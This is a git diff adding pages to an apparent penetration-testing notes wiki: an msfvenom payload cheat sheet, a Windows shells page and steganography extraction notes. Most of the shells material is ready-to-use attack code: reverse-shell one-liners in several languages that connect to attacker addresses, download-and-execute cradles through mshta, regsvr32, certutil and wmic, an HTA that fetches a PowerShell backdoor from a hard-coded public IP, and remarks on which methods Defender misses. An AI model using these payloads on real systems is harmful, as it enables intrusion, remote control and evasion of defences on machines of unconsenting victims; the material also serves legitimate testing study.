diff --git a/shells/shells/untitled.md b/shells/shells/untitled.md
new file mode 100644
index 00000000..50ed6b39
--- /dev/null
+++ b/shells/shells/untitled.md
@@ -0,0 +1,169 @@
+# MSFVenom - CheatSheet
+
+`msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT> -i <ENCODE COUNT> LHOST=<IP>`  
+
+
+One can also use the `-a` to specify the architecture or the `--platform`
+
+## Listing
+
+```bash
+msfvenom -l #Payloads
+msfvenom -l encoders #Encoders
+```
+
+## Common params when creating a shellcode
+
+```bash
+-b "\x00\x0a\x0d" 
+-f c 
+-e x86/shikata_ga_nai -i 5 
+EXITFUNC=thread
+PrependSetuid=True #Use this to create a shellcode that will execute something with SUID
+```
+
+## **Windows**
+
+### **Reverse Shell**
+
+```bash
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
+```
+
+### Bind Shell
+
+```bash
+msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe
+```
+
+### Create User
+
+```bash
+
+
+-p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
+```
+
+### CMD Shell
+
+```bash
+msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe
+```
+
+### **Execute Command \(powershell nishang\)**
+
+```bash
+msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f python
+```
+
+### Encoder
+
+```bash
+msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
+```
+
+### Embedded inside executable
+
+```bash
+msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe
+```
+
+## Linux Payloads
+
+### Reverse Shell
+
+```bash
+msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
+msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
+```
+
+### Bind Shell
+
+```bash
+msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf
+```
+
+### SunOS \(Solaris\)
+
+```bash
+msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf
+```
+
+## **MAC Payloads**
+
+### **Reverse Shell:**
+
+```bash
+msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho
+```
+
+### **Bind Shell**
+
+```bash
+msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho
+```
+
+## **Web Based Payloads**
+
+### **PHP**
+
+#### Reverse shel**l**
+
+```bash
+msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
+cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASP
+```
+
+### ASP/x
+
+#### Reverse shell
+
+```bash
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx
+```
+
+### JSP
+
+#### Reverse shell
+
+```bash
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp
+```
+
+### WAR
+
+#### Reverse Shell
+
+```bash
+msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war
+```
+
+### NodeJS
+
+```bash
+sfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)
+```
+
+## **Script Language payloads**
+
+### **Perl**
+
+```bash
+msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl
+```
+
+### **Python**
+
+```bash
+msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py
+```
+
+### **Bash**
+
+```bash
+msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
+```
+
+\*\*\*\*
+
diff --git a/shells/shells/windows.md b/shells/shells/windows.md
new file mode 100644
index 00000000..49c0a733
--- /dev/null
+++ b/shells/shells/windows.md
@@ -0,0 +1,550 @@
+# Shells - Windows
+
+The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) for linux.  
+Obviously **there isn't SUID files or sudo privileges in Windows**, but it's useful to know **how** some **binaries** can be \(ab\)used perform some kind of unexpected actions like **execute arbitrary code.**
+
+## NC
+
+```bash
+nc.exe -e cmd.exe <Attacker_IP> <PORT>
+```
+
+## SBD
+
+**sbd** is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. sbd features AES-CBC-128 + HMAC-SHA1 encryption \(by Christophe Devine\), program execution \(-e option\), choosing source port, continuous reconnection with delay, and some other nice features. sbd supports TCP/IP communication only. sbd.exe \(part of the Kali linux distribution: /usr/share/windows-binaries/backdoors/sbd.exe\) can be uploaded to a Windows box as a Netcat alternative.
+
+## Python
+
+```bash
+#Windows
+C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
+```
+
+## Perl
+
+```bash
+perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
+perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
+```
+
+## Ruby
+
+```bash
+#Windows
+ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
+```
+
+## Lua
+
+```bash
+lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
+```
+
+## OpenSSH
+
+Attacker \(Kali\)
+
+```bash
+openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
+openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
+openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
+```
+
+Victim
+
+```bash
+#Linux
+openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
+
+#Windows
+openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
+```
+
+## Powershell
+
+```bash
+powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
+powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
+echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
+```
+
+Process performing network call: **powershell.exe**  
+Payload written on disk: **NO** \(_at least nowhere I could find using procmon !_\)
+
+```bash
+powershell -exec bypass -f \\webdavserver\folder\payload.ps1
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+**One liner:** 
+
+```bash
+$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+```
+
+**Get more info about different Powershell Shells at the end of this document**
+
+## Mshta
+
+```bash
+mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
+```
+
+Process performing network call: **mshta.exe**  
+Payload written on disk: **IE local cache**
+
+```bash
+mshta http://webserver/payload.hta
+```
+
+Process performing network call: **mshta.exe**  
+Payload written on disk: **IE local cache**
+
+```bash
+mshta \\webdavserver\folder\payload.hta
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+#### **Example of hta-psh reverse shell \(use hta to download and execute PS backdoor\)**
+
+```markup
+ <scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
+```
+
+**You can download & execute very easily a Koadic zombie using the stager hta**
+
+#### hta example
+
+```markup
+<html>
+<head>
+<HTA:APPLICATION ID="HelloExample">
+<script language="jscript">
+        var c = "cmd.exe /c calc.exe"; 
+        new ActiveXObject('WScript.Shell').Run(c);
+</script>
+</head>
+<body>
+<script>self.close();</script>
+</body>
+</html>
+```
+
+**Extracted from** [**here**](https://gist.github.com/Arno0x/91388c94313b70a9819088ddf760683f)\*\*\*\*
+
+#### **mshta - sct**
+
+```markup
+<?XML version="1.0"?>
+<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
+<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
+<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
+<scriptlet>
+<public>
+</public>
+<script language="JScript">
+<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+]]>
+</script>
+</scriptlet>
+```
+
+**Extracted from** [**here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)\*\*\*\*
+
+#### **Mshta - Metasploit**
+
+```bash
+use exploit/windows/misc/hta_server
+msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
+msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
+msf exploit(windows/misc/hta_server) > exploit
+```
+
+```bash
+Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
+```
+
+**Detected by defender**
+
+## **Rundll32**
+
+\*\*\*\*[**Dll hello world example**](https://github.com/carterjones/hello-world-dll)\*\*\*\*
+
+```bash
+rundll32 \\webdavserver\folder\payload.dll,entrypoint
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+```bash
+rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
+```
+
+Process performing network call: **rundll32.exe**  
+Payload written on disk: **IE local cache**
+
+**Detected by defender**
+
+**Rundll32 - sct**
+
+```bash
+<?XML version="1.0"?>
+<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
+<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
+<scriptlet>
+<public>
+</public>
+<script language="JScript">
+<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+]]>
+</script>
+</scriptlet>
+```
+
+**Extracted from** [**here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)\*\*\*\*
+
+#### **Rundll32 - Metasploit**
+
+```bash
+use windows/smb/smb_delivery
+run
+#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
+```
+
+**Rundll32 - Koadic**
+
+```bash
+use stager/js/rundll32_js
+set SRVHOST 192.168.1.107
+set ENDPOINT sales
+run
+#Koadic will tell you what you need to execute inside the victim, it will be something like:
+rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
+```
+
+## Regsvr32
+
+```bash
+regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
+```
+
+Process performing network call: **regsvr32.exe**  
+Payload written on disk: **IE local cache**
+
+```text
+regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+**Detected by defender**
+
+#### Regsvr32 -sct
+
+```markup
+<?XML version="1.0"?>
+<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
+<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
+	<script language="JScript">
+		<![CDATA[
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+		]]>
+</script>
+</registration>
+</scriptlet>
+```
+
+**Extracted from** [**here**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)\*\*\*\*
+
+#### **Regsvr32 - Metasploit**
+
+```bash
+use multi/script/web_delivery
+set target 3
+set payload windows/meterpreter/reverse/tcp
+set lhost 10.2.0.5
+run
+#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
+```
+
+**You can download & execute very easily a Koadic zombie using the stager regsvr**
+
+## Certutil
+
+Download a B64dll, decode it and execute it.
+
+```bash
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
+```
+
+Download a B64exe, decode it and execute it.
+
+```bash
+certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
+```
+
+**Detected by defender**
+
+## **Cscript/Wscript**
+
+```bash
+powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""
+```
+
+**Cscript - Metasploit**
+
+```bash
+msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
+```
+
+**Detected by defender**
+
+## PS-Bat
+
+```bash
+\\webdavserver\folder\batchfile.bat
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+```bash
+msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
+impacket-smbserver -smb2support kali `pwd`
+```
+
+```bash
+\\10.8.0.3\kali\shell.bat
+```
+
+**Detected by defender**
+
+## **MSIExec**
+
+Attacker
+
+```text
+msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
+python -m SimpleHTTPServer 80
+```
+
+Victim:
+
+```text
+victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
+```
+
+**Detected**
+
+## **Wmic**
+
+```text
+wmic os get /format:"https://webserver/payload.xsl"
+```
+
+Process performing network call: **wmic.exe**  
+Payload written on disk: **IE local cache**
+
+Example xsl file:
+
+```text
+<?xml version='1.0'?>
+<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+		<![CDATA[
+			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
+		]]>
+	</ms:script>
+</stylesheet>
+```
+
+Extracted from [here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7)
+
+**Not detected**
+
+**You can download & execute very easily a Koadic zombie using the stager wmic**
+
+## Msbuild
+
+```text
+cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions. As you will be prompted with a PS shell.  
+Just download this and execute it: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
+
+```text
+C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
+```
+
+**Not detected**
+
+## **CSC**
+
+Compile C\# code in the victim machine.
+
+```text
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
+```
+
+You can download a basic C\# reverse shell from here: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
+
+**Not deteted**
+
+## **Regasm/Regsvc**
+
+```text
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
+```
+
+Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+**I haven't tried it**
+
+\*\*\*\*[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)\*\*\*\*
+
+## Odbcconf
+
+```text
+odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
+```
+
+ Process performing network call: **svchost.exe**  
+Payload written on disk: **WebDAV client local cache**
+
+**I haven't tried it**
+
+\*\*\*\*[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)\*\*\*\*
+
+## Powershell Shells
+
+### PS-Nishang
+
+[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
+
+In the **Shells** folder there are a lot of different shells. To download and execute Invoke-_PowerShellTcp.ps1_ make a copy of the script, append to the end of the file:
+
+```text
+Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
+```
+
+Start serving the script in a web server and execute in the victim:
+
+```text
+powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
+```
+
+Defender doesn't detect it as malicious code \(yet, 3/04/2019\).
+
+**TODO: Check other nishang shells**
+
+### **PS-Powercat**
+
+\*\*\*\*[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)\*\*\*\*
+
+Download, start web server, star listener and execute in victim:
+
+```
+ powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
+```
+
+Defender doesn't detect it as malicious code \(yet, 3/04/2019\).
+
+**Other options offered by powercat:**
+
+Bind shells, Reverse shell \(TCP, UDP, DNS\), Port redirect, upload/download, Generate payloads, Serve files...
+
+```text
+Serve a cmd Shell:
+    powercat -l -p 443 -e cmd
+Send a cmd Shell:
+    powercat -c 10.1.1.1 -p 443 -e cmd
+Send a powershell:
+    powercat -c 10.1.1.1 -p 443 -ep
+Send a powershell UDP:
+    powercat -c 10.1.1.1 -p 443 -ep -u
+TCP Listener to TCP Client Relay:
+    powercat -l -p 8000 -r tcp:10.1.1.16:443
+Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
+    powercat -c 10.1.1.15 -p 443 -e cmd -g
+Start A Persistent Server That Serves a File:
+    powercat -l -p 443 -i C:\inputfile -rep
+```
+
+### Empire
+
+[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
+
+Create a powershell launcher, save it in a file and download and execute it.
+
+```text
+powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
+```
+
+**Detected as malicious code**
+
+### MSF-Unicorn
+
+[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
+
+Create a powershell version of metasploit backdoor using unicorn
+
+```text
+python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
+```
+
+Start msfconsole with the created resource:
+
+```text
+msfconsole -r unicorn.rc
+```
+
+Start a web server serving the _powershell\_attack.txt_ file and execute in the victim:
+
+```text
+powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
+```
+
+**Detected as malicious code**
+
+
+
+## More
+
+[PS&gt;Attack](https://github.com/jaredhaight/PSAttack) PS console with some offensive PS modules preloaded \(cyphered\)  
+[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[  
+WinPWN](https://github.com/SecureThisShit/WinPwn) PS console with some offensive PS modules and proxy detection \(IEX\)
+
+## Bibliography
+
+{% embed url="https://highon.coffee/blog/reverse-shell-cheat-sheet/" %}
+
+{% embed url="https://gist.github.com/Arno0x" %}
+
+{% embed url="https://github.com/GreatSCT/GreatSCT" %}
+
+{% embed url="https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/" %}
+
+{% embed url="https://www.hackingarticles.in/koadic-com-command-control-framework/" %}
+
+{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" %}
+
+
+
diff --git a/stego/esoteric-languages.md b/stego/esoteric-languages.md
new file mode 100644
index 00000000..fe677505
--- /dev/null
+++ b/stego/esoteric-languages.md
@@ -0,0 +1,17 @@
+# Esoteric languages
+
+### Malbolge
+
+```text
+('&%:9]!~}|z2Vxwv-,POqponl$Hjig%eB@@>}=<M:9wv6WsU2T|nm-,jcL(I&%$#"
+`CB]V?Tx<uVtT`Rpo3NlF.Jh++FdbCBA@?]!~|4XzyTT43Qsqq(Lnmkj"Fhg${z@>
+```
+
+[http://malbolge.doleczek.pl/](http://malbolge.doleczek.pl/)
+
+### npiet
+
+![](../.gitbook/assets/image%20%28179%29.png)
+
+[https://www.bertnase.de/npiet/npiet-execute.php](https://www.bertnase.de/npiet/npiet-execute.php)
+
diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md
new file mode 100644
index 00000000..3cd561e6
--- /dev/null
+++ b/stego/stego-tricks.md
@@ -0,0 +1,182 @@
+# Stego Tricks
+
+**Some info was taken from** [**https://0xrick.github.io/lists/stego/**](https://0xrick.github.io/lists/stego/) **and from** [**https://github.com/DominicBreuker/stego-toolkit**](https://github.com/DominicBreuker/stego-toolkit)\*\*\*\*
+
+## Extracting data from all files
+
+### Binwalk <a id="binwalk"></a>
+
+Binwalk is a tool for searching binary files like images and audio files for embedded files and data.  
+It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github.  
+**Useful commands**:  
+`binwalk file` : Displays the embedded data in the given file  
+`binwalk -e file` : Displays and extracts the data from the given file  
+`binwalk --dd ".*" file` : Displays and extracts the data from the given file
+
+### Foremost <a id="foremost"></a>
+
+Foremost is a program that recovers files based on their headers , footers and internal data structures , I find it useful when dealing with png images. You can select the files that foremost extract by changing the config file in **/etc/foremost.conf.**  
+It can be installed with `apt` however the [source](https://github.com/korczis/foremost) can be found on github.  
+**Useful commands:**  
+ `foremost -i file` : extracts data from the given file.
+
+### Exiftool <a id="exiftool"></a>
+
+Sometimes important stuff is hidden in the metadata of the image or the file , exiftool can be very helpful to view the metadata of the files.  
+You can get it from [here](https://www.sno.phy.queensu.ca/~phil/exiftool/)  
+**Useful commands:**  
+`exiftool file` : shows the metadata of the given file
+
+### Exiv2 <a id="exiv2"></a>
+
+A tool similar to exiftool.  
+It can be installed with `apt` however the [source](https://github.com/Exiv2/exiv2) can be found on github.  
+[Official website](http://www.exiv2.org/)  
+**Useful commands:**  
+ `exiv2 file` : shows the metadata of the given file
+
+### File
+
+Check out what kind of file you have
+
+### Strings
+
+Extract strings from the file.  
+Useful commands:  
+`strings -n 6 file`: Extact the strings with min length of 6  
+`strings -n 6 file | head -n 20`: Extact first 20 strings with min length of 6  
+`strings -n 6 file | tail -n 20`: Extact last 20 strings with min length of 6  
+`strings -e s -n 6 file`: Extact 7bit strings  
+`strings -e S -n 6 file`: Extact 8bit strings   
+`strings -e l -n 6 file`: Extact 16bit strings \(little-endian\)  
+`strings -e b -n 6 file`: Extact 16bit strings \(big-endian\)  
+`strings -e L -n 6 file`: Extact 32bit strings \(little-endian\)  
+`strings -e B -n 6 file`: Extact 32bit strings \(big-endian\)
+
+## Extracting hidden data in text
+
+### Hidden data in spaces
+
+If you find that a **text line** is **bigger** than it should, then some **hidden information** could by included inside the **spaces** usnig invisible characters.󐁈󐁥󐁬󐁬󐁯󐀠󐁴󐁨  
+To **extract** the **data** you can use: [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder)
+
+## Extracting data from images
+
+### identify
+
+ [GraphicMagick](http://www.graphicsmagick.org/) tool to check what kind of image a file is. Checks also if image is corrupted.  
+ `identify -verbose stego.jpg`
+
+### Steghide \[JPEG, BMP, WAV, AU\] <a id="steghide"></a>
+
+Steghide is a steganography program that hides data in various kinds of image and audio files , only supports these file formats : `JPEG, BMP, WAV and AU`. but it’s also useful for extracting embedded and encrypted data from other files.  
+ It can be installed with `apt` however the [source](https://github.com/StefanoDeVuono/steghide) can be found on github.  
+**Useful commands:**  
+`steghide info file` : displays info about a file whether it has embedded data or not.  
+`steghide extract -sf file [--passphrase password]` : extracts embedded data from a file \[using a password\]
+
+You can also extract content from steghide using the web: [https://futureboy.us/stegano/decinput.html](https://futureboy.us/stegano/decinput.html)
+
+**Bruteforcing** Steghide: [stegcracker](https://github.com/Paradoxis/StegCracker.git) `stegcracker <file> [<wordlist>]`
+
+### Zsteg \[PNG, BMP\] <a id="zsteg"></a>
+
+zsteg is a tool that can detect hidden data in png and bmp files.  
+Install it : `gem install zsteg` , The source can be found on [github](https://github.com/zed-0xff/zsteg)  
+**Useful commands:**  
+ `zsteg -a file` : Runs all the methods on the given file  
+ `zsteg -E file` : Extracts data from the given payload \(example : zsteg -E b4,bgr,msb,xy name.png\)
+
+### stegoVeritasJPG, PNG, GIF, TIFF, BMP 
+
+A wide variety of simple and advanced checks. Check out `stegoveritas.py -h`. Checks metadata, creates many transformed images and saves them to a directory, Brute forces LSB, ...  
+ `stegoveritas.py stego.jpg` to run all checks
+
+### Stegsolve
+
+Sometimes there is a message or a text hidden in the image itself and in order to view it you need to apply some color filters or play with the color levels. You can do it with GIMP or Photoshop or any other image editing software but stegsolve made it easier. it’s a small java tool that applies many color filters on images. Personally i find it very useful  
+You can get it from [github](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve)  
+Just open the image with this tool and clinck on the  `<`  `>` buttons.
+
+### FFT
+
